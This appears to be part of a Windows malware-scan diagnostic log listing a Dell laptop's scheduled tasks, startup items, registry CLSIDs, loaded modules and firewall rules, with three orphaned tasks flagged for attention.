World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)
Yahoo! Detect (HKLM-x32\...\YTdetect) (Version:  - )
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\dell 2\AppData\Roaming\Dropbox\bin\Dropbox.exe /autoplay No File
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Program Files (x86)\Citrix\GoToMeeting\1082\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32 -> C:\Program Files\WinZip\adxloader64.dll ()
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\amd64\FileSyncApi64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\dell 2\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File
 
==================== Restore Points =========================
 
06-06-2015 14:10:34 Installed Microsoft AppLocale
06-06-2015 19:39:44 Removed piaip AppLocale
06-06-2015 20:12:19 Installed Adblock Plus for IE (32-bit and 64-bit)
08-06-2015 03:00:11 Windows Update
08-06-2015 03:58:59 Removed Itibiti RTC
08-06-2015 04:06:03 Norton_Power_Eraser_20150608040602812
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-03-04 14:00 - 2015-06-05 15:28 - 00000824 ____N C:\Windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0661E8E9-8E0B-4CEC-B9FD-A22C9C623A4D} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\MpCmdRun.exe
Task: {0A31A79E-2917-48A2-9B70-B5FC12E49153} - \avabvbxvh No Task File <==== ATTENTION
Task: {0CA834EB-1EA8-4427-993A-E7462477282A} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-02-20] (Google Inc.)
Task: {132761ED-7820-4A56-95A5-BDA0D61AB314} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)
Task: {163610C3-9715-40F2-8BEF-6EBE417C4AF9} - System32\Tasks\{0A48383E-28B8-4E3F-9733-DE0573B61731} => Chrome.exe 
Task: {176A12CA-0E00-48F8-996E-4F5457FB4C20} - \EssentialUpdateMachine No Task File <==== ATTENTION
Task: {1B685D25-D209-469B-936D-BEB2A90FF97C} - System32\Tasks\Norton Security Suite\Norton Error Analyzer => C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\SymErr.exe [2014-01-30] (Symantec Corporation)
Task: {1D9C375E-6506-4201-A792-7B6DA6D6BD9C} - System32\Tasks\{B48A0F62-6243-49C7-AE7F-8C6427269335} => pcalua.exe -a "C:\Users\dell 2\Downloads\XP32_14.51.10_5436_setup_ZPE (1).exe" -d "C:\Users\dell 2\Downloads"
Task: {27EF400E-E167-4D38-94BB-E4490C6BD2A7} - System32\Tasks\Microsoft\Windows\Setup\gwx\launchtrayprocess => C:\Windows\system32\GWX\GWX.exe [2015-05-07] (Microsoft Corporation)
Task: {43BCD539-61CF-4368-9094-0D2865404360} - No Task path
Task: {4A490EC1-238F-45B5-B905-716D5A8C6F18} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)
Task: {55006978-49FE-4621-BB29-F37A35FE547B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-02-20] (Google Inc.)
Task: {5801D1ED-85D8-4EBE-BEDD-1B08C604978D} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1000UA => C:\Users\Moncef Maiza\AppData\Local\Google\Update\GoogleUpdate.exe
Task: {60844B36-A841-49A9-98B0-1F20F87E6CD3} - System32\Tasks\SidebarExecute => C:\Program Files\Windows Sidebar\sidebar.exe [2010-11-20] (Microsoft Corporation)
Task: {79F4F321-31B3-4842-B7E2-ECACC6925A32} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-06-06] (Adobe Systems Incorporated)
Task: {7CDBA3B1-E3FF-4EB3-84A1-52E8AF8CEF1F} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1000Core => C:\Users\Moncef Maiza\AppData\Local\Google\Update\GoogleUpdate.exe
Task: {815C1EC7-46EE-47F2-9CF4-B13611663B29} - System32\Tasks\AdobeAAMUpdater-1.0-Seville-dell 2 => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2013-01-24] (Adobe Systems Incorporated)
Task: {87537A66-F602-4AD7-9DC7-9C5D858336D0} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1006Core => C:\Users\dell 2\AppData\Local\Google\Update\GoogleUpdate.exe
Task: {89A119DE-451C-4C06-8801-58EA2087FC5E} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonx86\Microsoft Shared\OFFICE15\OLicenseHeartbeat.exe [2015-05-22] (Microsoft Corporation)
Task: {8BE8AB5D-0A62-44C1-AD56-621282D55F1F} - System32\Tasks\AdobeAAMUpdater-1.0-Seville-Moncef Maiza => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2013-01-24] (Adobe Systems Incorporated)
Task: {93B0B801-B55C-4979-849A-CE0BD7403DB7} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\WSCStub.exe [2015-03-07] (Symantec Corporation)
Task: {9B22D30B-5691-4663-B888-A3DE786DD255} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1006UA => C:\Users\dell 2\AppData\Local\Google\Update\GoogleUpdate.exe
Task: {A399D42A-8F22-47C4-8410-730F5C753DD2} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {AAACCC16-E7AD-4810-BC6B-C973C1249D91} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => C:\Windows\system32\compattel\DiagTrackRunner.exe [2015-03-16] (Microsoft Corporation)
Task: {B560DEF3-E1DF-423C-9599-C7829897E5B7} - System32\Tasks\Microsoft\Windows\Windows Activation Technologies\ValidationTask => C:\Windows\system32\Wat\WatAdminSvc.exe [2011-08-12] (Microsoft Corporation)
Task: {B614EC99-F5CB-4E6A-8400-E117B8E0CB54} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-04-14] (Microsoft Corporation)
Task: {BF1DAF5A-B951-4D4A-831F-9593CBE2657A} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-04-14] (Microsoft Corporation)
Task: {C59F9A76-7C94-4308-BAE8-DEF88DA3EA30} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2013-05-13] (Microsoft)
Task: {C89ED18D-F827-4148-95B5-0A8F9102D4A5} - System32\Tasks\Norton Security Suite\Norton Error Processor => C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\SymErr.exe [2014-01-30] (Symantec Corporation)
Task: {CB1DCA5A-6E2E-4B22-A3B9-3C8255632BAD} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxconfig => C:\Windows\system32\GWX\GWXConfigManager.exe [2015-05-07] (Microsoft Corporation)
Task: {D7701A85-7F86-4B4C-9803-0FF2E2CB2B6E} - \Winupdate No Task File <==== ATTENTION
Task: {DA7DE32F-CA49-4F18-BB63-C491B014AEEE} - System32\Tasks\FRAPS
Task: {DD7D4617-3404-4AC3-B62E-2082883DD5BC} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)
Task: {E8A5BA45-3FF7-44BB-B26A-B495BCDF0D7D} - System32\Tasks\{1C5A80C1-DE1F-471B-9B8D-629A5AC691AF} => pcalua.exe -a "C:\Users\dell 2\Downloads\XP32_14.51.10_5436_setup_ZPE.exe" -d "C:\Users\dell 2\Downloads"
Task: {EB7EB52E-D4D6-4C30-97A7-0AF79BC07CAA} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1000Core.job => C:\Users\Moncef Maiza\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1000UA.job => C:\Users\Moncef Maiza\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1006Core.job => C:\Users\dell 2\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1006UA.job => C:\Users\dell 2\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\Software Removal Tool logs upload retry.job => C:\Users\dell 2\Downloads\software_removal_tool.exe
Task: C:\Windows\Tasks\Tweaking.com - Windows Repair Tray Icon.job => C:\Program Files (x86)\Tweaking.com\Windows Repair (All in One)\WR_Tray_Icon.exe C:\Program Files (x86)\Tweaking.com\Windows Repair (All in One)Tweaking.com - Windows Repair)Created By Tweaking.com
 
==================== Loaded Modules (Whitelisted) ==============
 
2010-12-23 14:33 - 2010-12-23 14:33 - 01501696 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll
2014-03-15 15:18 - 2014-05-20 09:19 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2014-05-13 07:22 - 2003-04-18 18:06 - 00008192 _____ () c:\Windows\SysWOW64\srvany.exe
2015-03-19 20:25 - 2015-01-27 11:29 - 08898720 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2010-01-02 10:42 - 2010-01-02 10:42 - 00098304 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext_64.dll
2011-06-15 09:51 - 2011-03-28 13:55 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2012-06-09 02:36 - 2012-06-09 02:36 - 01229464 _____ () C:\Program Files (x86)\VMware\VMware Player\libxml2.dll
2012-11-29 17:59 - 2012-11-29 17:59 - 00093696 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext.dll
2014-02-10 18:34 - 2015-04-16 13:40 - 00776192 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2015-01-20 22:07 - 2015-04-22 22:16 - 04962816 _____ () C:\Program Files (x86)\Steam\v8.dll
2015-01-20 22:07 - 2015-04-22 22:16 - 01556992 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2015-01-20 22:07 - 2015-04-22 22:16 - 01187840 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2014-05-24 10:46 - 2015-06-04 14:56 - 02407104 _____ () C:\Program Files (x86)\Steam\video.dll
2014-09-02 01:45 - 2014-12-01 17:31 - 02396672 _____ () C:\Program Files (x86)\Steam\libavcodec-56.dll
2014-09-02 01:45 - 2014-12-01 17:31 - 00442880 _____ () C:\Program Files (x86)\Steam\libavutil-54.dll
2014-09-02 01:45 - 2014-12-01 17:31 - 00479744 _____ () C:\Program Files (x86)\Steam\libavformat-56.dll
2014-09-02 01:45 - 2014-12-01 17:31 - 00332800 _____ () C:\Program Files (x86)\Steam\libavresample-2.dll
2014-09-02 01:45 - 2014-12-01 17:31 - 00485888 _____ () C:\Program Files (x86)\Steam\libswscale-3.dll
2014-02-25 13:57 - 2015-06-04 14:56 - 00703168 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2015-06-05 00:20 - 2015-06-05 00:20 - 26065408 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\libcef.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00739840 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\libGLESv2.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00909312 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\platforms\qwindows.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00130048 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\libEGL.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00020992 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\imageformats\qgif.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00021504 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\imageformats\qico.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00205312 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\imageformats\qjpeg.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00225792 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\imageformats\qmng.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00015872 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\imageformats\qsvg.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00312832 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\imageformats\qtiff.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00010240 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\qml\QtQuick.2\qtquick2plugin.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00054272 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\qml\QtQuick\Layouts\qquicklayoutsplugin.dll
2015-06-05 00:20 - 2015-06-05 00:20 - 00010240 _____ () C:\Program Files (x86)\Battle.net\Battle.net.5833\qml\QtQml\Models.2\modelsplugin.dll
2015-06-06 19:55 - 2015-06-06 19:55 - 16863920 _____ () C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_169.dll
2014-01-10 15:33 - 2015-05-11 15:01 - 36302728 _____ () C:\Program Files (x86)\Steam\bin\libcef.dll
2015-06-07 03:53 - 2015-05-22 16:22 - 01281864 _____ () C:\Program Files (x86)\Google\Chrome\Application\43.0.2357.81\libglesv2.dll
2015-06-07 03:53 - 2015-05-22 16:22 - 00080712 _____ () C:\Program Files (x86)\Google\Chrome\Application\43.0.2357.81\libegl.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BFE => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MpsSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MSIServer => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SharedAccess => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vss => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HandsFree Client => "DisplayName"="HandsFree Client"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HandsFree Client => "ErrorControl"="1"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HandsFree Client => "ImagePath"="C:\Program Files (x86)\HandsFree\Client\srvc.exe"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HandsFree Client => "ObjectName"="LocalSystem"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HandsFree Client => "Start"="2"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HandsFree Client => "Type"="272"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HandsFree Client\Parameters => "Application"="C:\Program Files (x86)\HandsFree\Client\srvc.exe"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HandsFree Client\Parameters => "AppParameters"=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MSIServer => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vss => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\dell.com -> dell.com
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\Control Panel\Desktop\\Wallpaper -> C:\Users\dell 2\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 209.18.47.61 - 209.18.47.62
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Bluetooth.lnk => C:\Windows\pss\Bluetooth.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Dell System Manager.lnk => C:\Windows\pss\Dell System Manager.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Digital Line Detect.lnk => C:\Windows\pss\Digital Line Detect.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^FAH.lnk => C:\Windows\pss\FAH.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^WinZip Preloader.lnk => C:\Windows\pss\WinZip Preloader.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^dell 2^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OpenOffice.org 3.3.lnk => C:\Windows\pss\OpenOffice.org 3.3.lnk.Startup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: AdobeCS6ServiceManager => "C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe" -launchedbylogin
MSCONFIG\startupreg: Apoint => C:\Program Files\DellTPad\Apoint.exe
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: BitTorrent => "C:\Users\dell 2\AppData\Roaming\BitTorrent\BitTorrent.exe"  /MINIMIZED
MSCONFIG\startupreg: DBRMTray => C:\Dell\DBRM\Reminder\DbrmTrayIcon.exe
MSCONFIG\startupreg: Dell Webcam Central => "C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe" /mode2
MSCONFIG\startupreg: Desktop Disc Tool => "C:\Program Files (x86)\Roxio\OEM\Roxio Burn\RoxioBurnLauncher.exe"
MSCONFIG\startupreg: FreeFallProtection => C:\Program Files (x86)\STMicroelectronics\AccelerometerP11\FF_Protection.exe
MSCONFIG\startupreg: Google Update => "C:\Users\dell 2\AppData\Local\Google\Update\GoogleUpdate.exe" /c
MSCONFIG\startupreg: GoogleDriveSync => "C:\Program Files (x86)\Google\Drive\googledrivesync.exe" /autostart
MSCONFIG\startupreg: IntelPROSet => "C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe" /tf Intel PROSet/Wireless
MSCONFIG\startupreg: PDVD9LanguageShortcut => "C:\Program Files (x86)\CyberLink\PowerDVD9\Language\Language.exe"
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RemoteControl9 => "C:\Program Files (x86)\CyberLink\PowerDVD9\PDVD9Serv.exe"
MSCONFIG\startupreg: RoxWatchTray => "C:\Program Files (x86)\Common Files\Roxio Shared\OEM\12.0\SharedCOM\RoxWatchTray12OEM.exe"
MSCONFIG\startupreg: SwitchBoard => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
MSCONFIG\startupreg: SysTrayApp => C:\Program Files\IDT\WDM\sttray64.exe
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [VirtualPC-In-UDP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-UDP-2] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-TCP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [{2A1A83FD-1AA7-43B2-851C-16C3E2443A02}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD9\PowerDVD Cinema\PowerDVDCinema.exe
FirewallRules: [{1C290216-96D1-4181-898E-2DBD85BDC365}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD9\PowerDVD9.EXE
FirewallRules: [{1036D150-A554-4702-BFF6-7925CC67799A}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{D4EB9F7D-8DAA-4480-903C-D214601B7290}] => (Allow) LPort=2869
FirewallRules: [{254C43CB-BDD5-4EDB-B305-7622FB7F9816}] => (Allow) LPort=1900
FirewallRules: [{51FC7B6B-F90F-4AE8-ABB5-6164787F403F}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{42C88828-00AC-4FAD-BAAB-31BDD4237771}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe
FirewallRules: [{F4CAD8F4-596C-4522-8E1E-95096BE9D8D2}] => (Allow) LPort=61116
FirewallRules: [{C2321305-09B7-4725-A2AF-0E7D9CBD8726}] => (Allow) LPort=21112
FirewallRules: [{0D2253CB-C466-4D55-AF0F-53AB2FE15C42}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{23A99D00-5A19-4C2E-B644-8D1333FD0270}C:\program files (x86)\pidgin\pidgin.exe] => (Allow) C:\program files (x86)\pidgin\pidgin.exe
FirewallRules: [UDP Query User{D42BC224-B336-4890-B663-7F0DF9DC8CEC}C:\program files (x86)\pidgin\pidgin.exe] => (Allow) C:\program files (x86)\pidgin\pidgin.exe
FirewallRules: [{415DE125-0901-4DAD-BAD7-E404D94E034A}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [TCP Query User{6C35A36A-FB7D-4D8D-9684-9342FDF5EF7D}C:\program files (x86)\premiumsoft\navicat lite\navicat.exe] => (Allow) C:\program files (x86)\premiumsoft\navicat lite\navicat.exe
FirewallRules: [UDP Query User{26FEF1AD-B07D-4907-8A40-F0A1005BAA7E}C:\program files (x86)\premiumsoft\navicat lite\navicat.exe] => (Allow) C:\program files (x86)\premiumsoft\navicat lite\navicat.exe
FirewallRules: [{359979AA-2130-4590-A9A9-857917AA1134}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{3D18FE95-6F62-4BBB-A61D-493135890990}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [TCP Query User{CE9CEA05-2FEF-49CA-BAA5-2B1F8379024D}C:\windows\explorer.exe] => (Block) C:\windows\explorer.exe
FirewallRules: [UDP Query User{87524CD2-7D39-40D2-A190-D0B4049E52CC}C:\windows\explorer.exe] => (Block) C:\windows\explorer.exe
FirewallRules: [{CEB2893C-1394-4CCA-9E30-0F4BD9CA9399}] => (Allow) LPort=61117
FirewallRules: [{8D0DE2F9-8F67-4834-A345-5D613D40C7DC}] => (Allow) C:\Program Files (x86)\HandsFree\Client\cust.exe
